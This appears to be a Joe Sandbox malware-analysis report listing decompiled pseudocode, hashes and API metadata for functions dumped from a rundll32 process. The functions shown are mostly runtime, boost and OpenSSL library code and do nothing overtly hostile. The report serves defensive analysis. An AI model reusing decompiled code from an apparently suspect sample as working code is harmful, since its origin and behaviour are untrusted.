                                        • Instruction ID: cbaca4fd1c05cfd30aab1f1e8cf67055470712ef3547f39d891addc41e4bf341
                                        • Opcode Fuzzy Hash: 89cfd26d850f7974e19e0b8867d82d8511561a90e7ace9660613bfa6d740ea21
                                        • Instruction Fuzzy Hash: 61216DF2201B8095EE149B65E9483CE62A2B7947F0F5587269F7D03BD9DB38C562C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 65%
                                        			E0000021E21EF30182C8(long long __rbx, long long* __rcx, void* __rdx, long long __rsi, intOrPtr _a8, long long _a24) {
                                        				void* _v8;
                                        				char _v112;
                                        				char _v144;
                                        				long long _v152;
                                        				void* _t21;
                                        				void* _t25;
                                        				long long _t31;
                                        				long long* _t35;
                                        				intOrPtr _t38;
                                        				long long _t46;
                                        				long long _t50;
                                        				void* _t53;
                                        
                                        				_t31 = _t50;
                                        				_v152 = 0xfffffffe;
                                        				 *((long long*)(_t31 + 0x10)) = __rbx;
                                        				 *((long long*)(_t31 + 0x20)) = __rsi;
                                        				_t35 = __rcx;
                                        				 *(_t31 + 8) =  *(_t31 + 8) & 0x00000000;
                                        				if (__rcx == 0) goto 0xf3018389;
                                        				if ( *__rcx != 0) goto 0xf3018389;
                                        				E0000021E21EF310B674(_t31, __rcx);
                                        				_t46 = _t31;
                                        				_a24 = _t31;
                                        				_t38 =  *((intOrPtr*)(__rdx + 8));
                                        				if (_t38 != 0) goto 0xf3018328;
                                        				goto 0xf3018335;
                                        				if ( *((intOrPtr*)(_t38 + 0x28)) != 0) goto 0xf3018335;
                                        				E0000021E21EF3018114(_t31, _t35,  &_v112, _t38 + 0x30);
                                        				_a8 = 1;
                                        				 *_t46 = 0xf319e168;
                                        				 *(_t46 + 8) =  *(_t46 + 8) & 0x00000000;
                                        				 *_t46 = 0xf319e1f8;
                                        				_t21 = E0000021E21EF310A8FC(0xf319e1f8,  &_v144, _t38 + 0x30, _t53);
                                        				asm("movups xmm0, [eax]");
                                        				asm("movups [edi+0x10], xmm0");
                                        				asm("movups xmm1, [eax+0x10]");
                                        				asm("movups [edi+0x20], xmm1");
                                        				 *_t35 = _t46;
                                        				E0000021E21EF30181AC(_t21, _t25,  &_v112);
                                        				return 2;
                                        			}
















                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Locinfostd::_$GetctypeLocinfo::_Locinfo::~_
                                        • String ID:
                                        • API String ID: 1079120975-0
                                        • Opcode ID: 5e6238963374fccf7760cf20ed8fec3710a42fc4aad9a7a9750fee317ffc85ba
                                        • Instruction ID: f3e1060c41c845e394add470a78ed2416de7331bee63e7521c9c47e4da2ab59d
                                        • Opcode Fuzzy Hash: 5e6238963374fccf7760cf20ed8fec3710a42fc4aad9a7a9750fee317ffc85ba
                                        • Instruction Fuzzy Hash: EE216D32601B8091EF249B14E9487DA73B4F3A47A4F458322DF5C43B96EB3CC692C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0000021E21EF2FE5C20(void* __rcx, void* __rdx) {
                                        
                                        				if (__rcx != 0) goto 0xf2fe5c33;
                                        				return 0;
                                        			}




                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0d37bafe79ab884e732c02c6084ace85d5202ea00b8b743c5c86d92538d85b9c
                                        • Instruction ID: a9b45c38ae442bb2dbd32a30a92cdd0f0c61029c30cd30b7214ab4b50c82514b
                                        • Opcode Fuzzy Hash: 0d37bafe79ab884e732c02c6084ace85d5202ea00b8b743c5c86d92538d85b9c
                                        • Instruction Fuzzy Hash: 75F09062B62A0244EC19A3798C7D3ED11A017A4770E810B609E3E11FD1EA2CC1838380
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 18%
                                        			E0000021E21EF301C1EC(long long __rbx, void* __rcx, signed long long* __rdx, long long __rsi, long long _a24, long long _a32) {
                                        				void* _v8;
                                        				signed long long _v24;
                                        				char _v280;
                                        				void* __rdi;
                                        				struct HINSTANCE__* _t16;
                                        				void* _t17;
                                        				void* _t18;
                                        				void* _t21;
                                        				void* _t22;
                                        				signed long long _t27;
                                        				signed long long _t28;
                                        				void* _t47;
                                        				void* _t52;
                                        				void* _t55;
                                        				void* _t56;
                                        
                                        				_a24 = __rbx;
                                        				_a32 = __rsi;
                                        				_t27 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				_t28 = _t27 ^ _t52 - 0x00000130;
                                        				_v24 = _t28;
                                        				r8d = 0x100;
                                        				E0000021E21EF310E410(_t18, 0, _t21, _t22,  &_v280, __rdx, _t47, _t55);
                                        				lstrcpyA(??, ??);
                                        				__imp__StrChrA();
                                        				if (_t28 != 0) goto 0xf301c252;
                                        				goto 0xf301c28b;
                                        				 *_t28 = 0;
                                        				_t16 = LoadLibraryA(??);
                                        				if (_t28 == 0) goto 0xf301c24e;
                                        				if ( *((char*)(_t28 + 1)) != 0x23) goto 0xf301c27d;
                                        				__imp__StrToIntA();
                                        				 *__rdx = _t28;
                                        				_t17 = E0000021E21EF301C2B0(0x2e, __rdx, _t16, _t56);
                                        				E0000021E21EF310C290();
                                        				return _t17;
                                        			}

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoadlstrcpy
                                        • String ID:
                                        • API String ID: 304781146-0
                                        • Opcode ID: 9ca075ae90b82dc8fddcd07e3df318c8d222eca4c1415a003c80a3802afae1d1
                                        • Instruction ID: 3a3b3390072e301c7e2388db6ada611a6c4653fa3bbed362a4df0c6e6ff94f17
                                        • Opcode Fuzzy Hash: 9ca075ae90b82dc8fddcd07e3df318c8d222eca4c1415a003c80a3802afae1d1
                                        • Instruction Fuzzy Hash: 8A110D36215A8092EF21DB21EC583DAB3A0B7ADB84F568122DE8D47B69DF3CC556C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 63%
                                        			E0000021E21EF3126870(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long _a8) {
                                        				void* _t4;
                                        				void* _t9;
                                        				intOrPtr _t11;
                                        				intOrPtr _t14;
                                        				void* _t23;
                                        				void* _t27;
                                        				void* _t29;
                                        				void* _t32;
                                        				void* _t33;
                                        
                                        				_t29 = __rdx;
                                        				_t27 = __rcx;
                                        				_t25 = __rbx;
                                        				_t23 = __rax;
                                        				_a8 = __rbx;
                                        				GetLastError();
                                        				_t11 =  *0xf32032b0; // 0x7
                                        				if (_t11 == 0xffffffff) goto 0xf312689a;
                                        				_t4 = E0000021E21EF3126F7C(_t11, __rax, __rbx);
                                        				if (__rax != 0) goto 0xf31268db;
                                        				E0000021E21EF3122114(_t4, _t27, _t29);
                                        				_t32 = _t23;
                                        				if (_t23 != 0) goto 0xf31268ba;
                                        				E0000021E21EF3124EE0(_t23, _t27);
                                        				goto 0xf31268f6;
                                        				_t14 =  *0xf32032b0; // 0x7
                                        				if (E0000021E21EF3126FD4(_t14, _t23, _t25, _t23, _t33) == 0) goto 0xf31268b3;
                                        				E0000021E21EF31265DC(_t32, _t23);
                                        				_t9 = E0000021E21EF3124EE0(_t23, _t32);
                                        				if (_t32 == 0) goto 0xf31268f6;
                                        				SetLastError(??);
                                        				return _t9;
                                        			}

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$abort
                                        • String ID:
                                        • API String ID: 1447195878-0
                                        • Opcode ID: 979b99e8c2369e89e4b2a2efa61d5ab4c60160ca73a09f3242b90a8b4a1fc751
                                        • Instruction ID: e8bbeb0e95458db8620f9918a6f99ddd0cdba76a914a2194aabb6d8e02eb935d
                                        • Opcode Fuzzy Hash: 979b99e8c2369e89e4b2a2efa61d5ab4c60160ca73a09f3242b90a8b4a1fc751
                                        • Instruction Fuzzy Hash: E001843430174046FE79A331AE5D3EB21F29B78BD0F164128AE1A02FC6EE6CC857C200
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandle$CriticalDeleteSection
                                        • String ID:
                                        • API String ID: 2166061224-0
                                        • Opcode ID: 33f892d42eef6fcb9a662957687bdcbb0d5a53a28e26da64c28067adbcd5383d
                                        • Instruction ID: eebff00db7e657b92deb9746f60ee8e9b33a103363adb4dd52a67c61507680ac
                                        • Opcode Fuzzy Hash: 33f892d42eef6fcb9a662957687bdcbb0d5a53a28e26da64c28067adbcd5383d
                                        • Instruction Fuzzy Hash: FB018F32201A0185FF109F20E9483AE6370FB96FA4F564320CE6E53AA8DF2CC4A6C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0000021E21EF2FE88E0(void* __rdx) {
                                        
                                        				if (__rdx != 0) goto 0xf2fe88f2;
                                        				return 0;
                                        			}

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0bf691473c3dc8e1f1a1c1771e97749a043232d717cb8ecec532a7da6f68d384
                                        • Instruction ID: 16e0d9fbe94d6ebc6c3e5b9b8432215f6144abb5e022caa6e1cc3db8886e442a
                                        • Opcode Fuzzy Hash: 0bf691473c3dc8e1f1a1c1771e97749a043232d717cb8ecec532a7da6f68d384
                                        • Instruction Fuzzy Hash: 1BF030B2B6264185ED19F315889E3AD01A067B8BB0F9107649E3E46BE1EE1CC5978340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 83%
                                        			E0000021E21EF312803C(void* __edx, void* __edi, void* __esp, long long __rbx, unsigned int* __rcx, signed long long __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, char* _a40, intOrPtr _a48, signed int _a56, intOrPtr _a64, intOrPtr _a72) {
                                        				void* _v24;
                                        				intOrPtr _v32;
                                        				intOrPtr _v48;
                                        				intOrPtr _v56;
                                        				long long _v72;
                                        				intOrPtr _v80;
                                        				intOrPtr _v88;
                                        				intOrPtr _v96;
                                        				long long _v104;
                                        				void* _t62;
                                        				void* _t65;
                                        				void* _t69;
                                        				char _t70;
                                        				char _t73;
                                        				signed char _t75;
                                        				void* _t86;
                                        				intOrPtr _t87;
                                        				void* _t88;
                                        				signed int _t96;
                                        				void* _t124;
                                        				intOrPtr* _t139;
                                        				char* _t143;
                                        				long long _t171;
                                        				signed long long _t174;
                                        				intOrPtr* _t178;
                                        				char* _t179;
                                        				signed long long _t184;
                                        				void* _t185;
                                        				signed long long _t192;
                                        				signed long long _t194;
                                        				signed long long _t197;
                                        				signed long long _t201;
                                        				intOrPtr* _t202;
                                        				char* _t203;
                                        				intOrPtr* _t204;
                                        				char* _t205;
                                        				void* _t206;
                                        				char* _t208;
                                        				void* _t209;
                                        				char* _t210;
                                        				char* _t211;
                                        				char* _t212;
                                        				char* _t213;
                                        				unsigned int* _t216;
                                        				void* _t219;
                                        				intOrPtr* _t221;
                                        				char* _t227;
                                        				long long _t235;
                                        				intOrPtr* _t239;
                                        				char* _t241;
                                        
                                        				_t171 = __rbx;
                                        				_t139 = _t221;
                                        				 *((long long*)(_t139 + 8)) = __rbx;
                                        				 *((long long*)(_t139 + 0x10)) = __rbp;
                                        				 *((long long*)(_t139 + 0x18)) = __rsi;
                                        				 *((long long*)(_t139 + 0x20)) = __rdi;
                                        				_push(_t235);
                                        				r12d = 0;
                                        				_t201 = __rdx;
                                        				 *((intOrPtr*)(__rdx)) = r12b;
                                        				_t216 = __rcx;
                                        				_t174 = _t139 - 0x38;
                                        				_t219 = __r8;
                                        				_t86 =  <  ? r12d : _a48;
                                        				E0000021E21EF3111664(_t139, __rbx, _t174, _a72);
                                        				if (__r8 - _t171 + 0xb > 0) goto 0xf31280aa;
                                        				_t62 = E0000021E21EF3118984(_t139);
                                        				_t9 = _t235 + 0x22; // 0x22
                                        				_t87 = _t9;
                                        				 *_t139 = _t87;
                                        				E0000021E21EF3111BC8(_t62);
                                        				goto 0xf3128365;
                                        				if (( *__rcx >> 0x00000034 & _t174) != _t174) goto 0xf3128135;
                                        				_v72 = _t235;
                                        				_v80 = _a64;
                                        				_t192 = _t201;
                                        				_t143 = _a40;
                                        				_v88 = r12b;
                                        				_v96 = _t87;
                                        				_v104 = _t143;
                                        				_t65 = E0000021E21EF312839C(_t171, __rcx, _t192, __rcx, __r8);
                                        				_t88 = _t65;
                                        				if (_t65 == 0) goto 0xf3128103;
                                        				 *_t201 = r12b;
                                        				goto 0xf3128365;
                                        				strrchr(_t241);
                                        				if (_t143 == 0) goto 0xf3128362;
                                        				asm("sbb dl, dl");
                                        				 *_t143 = 0xd0;
                                        				 *((intOrPtr*)(_t143 + 3)) = r12b;
                                        				goto 0xf3128362;
                                        				if (( *_t216 & 0x00000000) == 0) goto 0xf312814a;
                                        				 *_t201 = 0x2d;
                                        				_t202 = _t201 + 1;
                                        				r15b = _a56;
                                        				r10d = 0x30;
                                        				asm("sbb edx, edx");
                                        				if (( *_t216 & 0x00000000) != 0) goto 0xf312819d;
                                        				 *_t202 = r10b;
                                        				_t203 = _t202 + 1;
                                        				asm("dec eax");
                                        				goto 0xf31281a3;
                                        				 *_t203 = 0x31;
                                        				_t204 = _t203 + 1;
                                        				_t239 = _t204;
                                        				_t205 = _t204 + 1;
                                        				if (_t88 != 0) goto 0xf31281b2;
                                        				 *_t239 = r12b;
                                        				goto 0xf31281c6;
                                        				 *_t239 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0xf8))))));
                                        				if (( *_t216 & 0xffffffff) <= 0) goto 0xf3128259;
                                        				r8d = r10w & 0xffffffff;
                                        				if (_t88 <= 0) goto 0xf312820f;
                                        				_t69 =  ~r15b + r10w;
                                        				_t124 = _t69 - 0x39;
                                        				if (_t124 <= 0) goto 0xf31281fd;
                                        				_t70 = _t69 + 0xffffffff000000e7;
                                        				 *_t205 = _t70;
                                        				_t206 = _t205 + 1;
                                        				r8w = r8w + 0xfffc;
                                        				if (_t124 >= 0) goto 0xf31281dd;
                                        				if (r8w < 0) goto 0xf3128259;
                                        				_t96 = r8b;
                                        				if (_t70 - 8 <= 0) goto 0xf3128259;
                                        				_t28 = _t206 - 1; // 0x2
                                        				_t178 = _t28;
                                        				if (( *_t178 - 0x00000046 & 0x000000df) != 0) goto 0xf312823e;
                                        				 *_t178 = r10b;
                                        				_t179 = _t178 - 1;
                                        				goto 0xf312822e;
                                        				if (_t179 == _t239) goto 0xf3128256;
                                        				_t73 =  *_t179;
                                        				if (_t73 != 0x39) goto 0xf3128250;
                                        				 *_t179 = 0xffffffff00000121;
                                        				goto 0xf3128259;
                                        				 *_t179 = _t73 + 1;
                                        				goto 0xf3128259;
                                        				 *((char*)(_t179 - 1)) =  *((char*)(_t179 - 1)) + 1;
                                        				if (_t88 - 1 <= 0) goto 0xf3128274;
                                        				_t75 = E0000021E21EF310E410(_t96, r10b, __edi, __esp, _t206, _t192, _t206, _t171);
                                        				r10d = 0x30;
                                        				_t208 =  ==  ? _t239 : _t206 + _t171;
                                        				r15b =  ~r15b;
                                        				asm("sbb al, al");
                                        				 *_t208 = (_t75 & 0x000000e0) + 0x70;
                                        				if ( *_t239 - r12b < 0) goto 0xf31282a2;
                                        				 *((char*)(_t208 + 1)) = 0x2b;
                                        				_t209 = _t208 + 2;
                                        				goto 0xf31282ad;
                                        				 *((char*)(_t209 + 1)) = 0x2d;
                                        				_t210 = _t209 + 2;
                                        				_t184 =  ~(( *_t216 >> 0x34) - _t219);
                                        				 *_t210 = r10b;
                                        				_t227 = _t210;
                                        				if (_t184 - 0x3e8 < 0) goto 0xf31282ef;
                                        				_t194 = (_t192 >> 7) + (_t192 >> 7 >> 0x3f);
                                        				 *_t210 = __r10 + _t194;
                                        				_t211 = _t210 + 1;
                                        				_t185 = _t184 + _t194 * 0xfffffc18;
                                        				if (_t211 != _t227) goto 0xf31282f5;
                                        				if (_t185 - 0x64 < 0) goto 0xf3128323;
                                        				_t197 = (_t194 + _t185 >> 6) + (_t194 + _t185 >> 6 >> 0x3f);
                                        				 *_t211 = __r10 + _t197;
                                        				_t212 = _t211 + 1;
                                        				if (_t212 != _t227) goto 0xf312832e;
                                        				if (_t185 + _t197 * 0xffffff9c - 0xa < 0) goto 0xf3128359;
                                        				 *_t212 = __r10 + (_t197 >> 2) + (_t197 >> 2 >> 0x3f);
                                        				_t213 = _t212 + 1;
                                        				 *_t213 = (_t96 & 0x000007ff) + r10b;
                                        				 *((intOrPtr*)(_t213 + 1)) = r12b;
                                        				if (_v32 == r12b) goto 0xf3128378;
                                        				 *(_v56 + 0x3a8) =  *(_v56 + 0x3a8) & 0xfffffffd;
                                        				return r12d;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: gfffffff
                                        • API String ID: 3215553584-1523873471
                                        • Opcode ID: 0394c0a12d31b090ba6d4f006549612a7ab558deccbf8bb91b018acd81be3e69
                                        • Instruction ID: 4761c6af7c169f0aeb8357f8bac61568eec27ed485d179e0ab8e924984c37fe5
                                        • Opcode Fuzzy Hash: 0394c0a12d31b090ba6d4f006549612a7ab558deccbf8bb91b018acd81be3e69
                                        • Instruction Fuzzy Hash: E79123726057858AEF258F29AD483EEABE5A775BD0F058121CF9907BE6DA3CC512C301
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: *
                                        • API String ID: 3215553584-163128923
                                        • Opcode ID: d1b3c8bcca7984e45a2e1b92871d71e663809e6980a90e537f3949267acdaa75
                                        • Instruction ID: 4a4f71a229b307fc5ef9699db68bd5ed0f4099d6a96bcde2beefc102a36d2fcd
                                        • Opcode Fuzzy Hash: d1b3c8bcca7984e45a2e1b92871d71e663809e6980a90e537f3949267acdaa75
                                        • Instruction Fuzzy Hash: 03718F72114660C6EF64AF2488482EE3BF8F365F48F661116DE4643A9ADF38CCA3D744
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: *
                                        • API String ID: 3215553584-163128923
                                        • Opcode ID: cc965d7d74c4e5544afed584674b14193e697925cffd20aaa08f296383d6cb39
                                        • Instruction ID: 7a1867b82f4c8fcfb9814516a30012dee0d7c297b372d6454530536421b50dd0
                                        • Opcode Fuzzy Hash: cc965d7d74c4e5544afed584674b14193e697925cffd20aaa08f296383d6cb39
                                        • Instruction Fuzzy Hash: 7771907210525186EF78AF28C84C2EE7BF9F325F18F16151ADE4682A9ED739CC92C741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0000021E21EF300BB60(intOrPtr* __rcx, void* __rdx, void* __r8, void* __r10) {
                                        				signed int _t22;
                                        				intOrPtr* _t39;
                                        				intOrPtr _t43;
                                        				void* _t46;
                                        				intOrPtr _t51;
                                        
                                        				_t46 = __r8;
                                        				_t22 =  *(__rcx + 0x10) & 0x000000ff;
                                        				if (_t22 != 1) goto 0xf300bb86;
                                        				 *((long long*)(__rcx + 8)) =  *((long long*)(__rcx + 8)) + 0x10;
                                        				if ( *((intOrPtr*)(__rcx + 8)) !=  *__rcx + 0x48) goto 0xf300bc2c;
                                        				goto 0xf300eb20;
                                        				if (_t22 != 2) goto 0xf300bba5;
                                        				 *((long long*)(__rcx + 8)) =  *((long long*)(__rcx + 8)) + 0x10;
                                        				if ( *((intOrPtr*)(__rcx + 8)) !=  *__rcx + 0x38) goto 0xf300bc2c;
                                        				goto 0xf300fdc0;
                                        				if (_t22 != 3) goto 0xf300bc27;
                                        				 *((long long*)(__rcx + 8)) =  *((long long*)(__rcx + 8)) + 0x10;
                                        				_t51 =  *__rcx;
                                        				if ( *((intOrPtr*)(__rcx + 8)) != _t51 + 0x28) goto 0xf300bc2c;
                                        				_t43 =  *((intOrPtr*)(_t51 + 0x10));
                                        				r10d = 0;
                                        				_t39 =  *((intOrPtr*)(_t51 + 8));
                                        				if (_t39 == _t43) goto 0xf300bc0a;
                                        				_t14 = _t39 + 0x32; // 0xccccc35fe38b4928
                                        				r8d =  *_t14 & 0x0000ffff;
                                        				_t16 = _t46 + 2; // 0xccccc35fe38b492a
                                        				if ( *_t39 != _t43) goto 0xf300bbd0;
                                        				if (_t16 + __rdx + __r10 == 0) goto 0xf300bc0a;
                                        				if ( *(__rcx + 0x10) == 0) goto 0xf300bc00;
                                        				 *(__rcx + 0x10) = 0;
                                        				 *((long long*)(__rcx + 8)) =  *((intOrPtr*)(_t51 + 8));
                                        				 *(__rcx + 0x10) = 4;
                                        				return _t22;
                                        			}









                                        Strings
                                        • invalid iterator, xrefs: 0000021EF3011F0C
                                        • void __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chun, xrefs: 0000021EF3011F3F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: invalid iterator$void __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chun
                                        • API String ID: 0-301515690
                                        • Opcode ID: 0f6c08defd031064c914add2131498418f1c90f84a6fe79c585a60161cdf5400
                                        • Instruction ID: b2dd9691aec76b99fa569ef3c6ed3491dbd79f8a3ea8ee68b69009952dcf3f20
                                        • Opcode Fuzzy Hash: 0f6c08defd031064c914add2131498418f1c90f84a6fe79c585a60161cdf5400
                                        • Instruction Fuzzy Hash: 9E71E373106BD496EFA48718D84839A3BE1F365B48FA68516CE9C037A1DB7DC587C341
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 55%
                                        			E0000021E21EF302B8B0(void* __eflags, void* __rax, void* __rcx, void* __rdx, void* __r8, void* __r9) {
                                        				void* __rbx;
                                        				void* __rbp;
                                        				void* _t4;
                                        				void* _t12;
                                        				void* _t18;
                                        				void* _t19;
                                        
                                        				E0000021E21EF310C220();
                                        				_t19 = __r9;
                                        				if (E0000021E21EF3025C70(__rax, _t12, __rcx, __rdx) == 0) goto 0xf302b8f6;
                                        				E0000021E21EF3024EB0(0xf3208fd4);
                                        				if (__rax != 0) goto 0xf302b910;
                                        				_t4 = E0000021E21EF302BB50(__rax, 0xf3208fd4, _t18, _t19);
                                        				if (__rax != 0) goto 0xf302b910;
                                        				return _t4;
                                        			}










                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FiberSwitch
                                        • String ID: ..\..\openssl-1.1.0f\crypto\async\async.c
                                        • API String ID: 812016776-2190089840
                                        • Opcode ID: 4c29dc2dd828e81f484f439790ab6165f024a83e594b583a3deaee1881d45524
                                        • Instruction ID: da1ba6237e64cebf571ee28ceb83e9db90b20701bf0d551705993cd157c9ebc5
                                        • Opcode Fuzzy Hash: 4c29dc2dd828e81f484f439790ab6165f024a83e594b583a3deaee1881d45524
                                        • Instruction Fuzzy Hash: 3E515976201B0882EF24DF26E8483AB77A1F7A4B88F120416DE4C47BA9DF3CC566C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0000021E21EF312846C(void* __ebx, void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                        				void* _t11;
                                        				void* _t13;
                                        				intOrPtr* _t21;
                                        				intOrPtr* _t35;
                                        
                                        				_t21 = _t35;
                                        				 *((long long*)(_t21 + 8)) = __rbx;
                                        				 *((long long*)(_t21 + 0x10)) = __rbp;
                                        				 *((long long*)(_t21 + 0x18)) = __rsi;
                                        				 *((long long*)(_t21 + 0x20)) = __rdi;
                                        				r15b = r9b;
                                        				_t10 =  >  ? __ebx : 0;
                                        				_t11 = ( >  ? __ebx : 0) + 9;
                                        				if (__rdx - _t21 > 0) goto 0xf31284d1;
                                        				_t13 = E0000021E21EF3118984(_t21);
                                        				 *_t21 = 0x22;
                                        				E0000021E21EF3111BC8(_t13);
                                        				return 0x22;
                                        			}








                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: e+000$gfff
                                        • API String ID: 3215553584-3030954782
                                        • Opcode ID: 869a70dfdbdc3df35be45184b0e9f6a1c57ae12249e54dc23cd95b0bcfd1e6cd
                                        • Instruction ID: 6f8a4d5ba7f15ff0ddd67ad695f2a70655fe0fb7246b5cb39452e5a19b146f26
                                        • Opcode Fuzzy Hash: 869a70dfdbdc3df35be45184b0e9f6a1c57ae12249e54dc23cd95b0bcfd1e6cd
                                        • Instruction Fuzzy Hash: B95107727147C48AEB358F39AD453DEABE1E3A1B90F099225DE9847FD6DA2CC446C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 35%
                                        			E0000021E21EF300BC30(intOrPtr* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long __rsi, long long _a8, long long _a16, long long _a24) {
                                        				long long _v16;
                                        				char _v24;
                                        				char _v32;
                                        				char _v40;
                                        				char _v48;
                                        				long long _v56;
                                        				void* __rdi;
                                        				long long _t115;
                                        				intOrPtr _t121;
                                        				long long _t122;
                                        				intOrPtr* _t130;
                                        				void* _t137;
                                        				void* _t138;
                                        
                                        				_a16 = __rdx;
                                        				_v56 = 0xfffffffe;
                                        				_a8 = __rbx;
                                        				_a24 = __rsi;
                                        				if (( *(__rcx + 0x20) & 0x000000ff) != 1) goto 0xf300bd61;
                                        				0xf3008c60();
                                        				_t130 = __rax;
                                        				_t115 = __rcx + 8;
                                        				E0000021E21EF300BB60(_t115,  *__rcx + 0x10, _t137, _t138);
                                        				if ( *_t115 ==  *_t130) goto 0xf300bc88;
                                        				goto 0xf300bcf0;
                                        				if (0 ==  *((intOrPtr*)(_t130 + 0x10))) goto 0xf300bc95;
                                        				goto 0xf300bcf0;
                                        				if (0 == 0) goto 0xf300bcee;
                                        				if (0 != 1) goto 0xf300bcaa;
                                        				goto 0xf300bcf0;
                                        				if (0 != 2) goto 0xf300bcbb;
